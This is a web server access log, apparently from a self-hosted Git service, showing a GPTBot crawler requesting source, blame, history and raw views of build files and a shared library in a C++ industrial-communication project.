git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11621] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp" +[17/Feb/2026:16:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11621] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" +[17/Feb/2026:16:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" +[17/Feb/2026:16:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11292] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10202] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10428] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11047] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11047] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17038] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12993] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11011] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13495] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" +[17/Feb/2026:16:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13546] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" +[17/Feb/2026:16:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11898] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11619] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp" +[17/Feb/2026:16:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17966] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10230] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14156] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10233] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10217] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11086] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11046] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70933] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2349] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15181] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13706] [Gzip 6.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10627] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 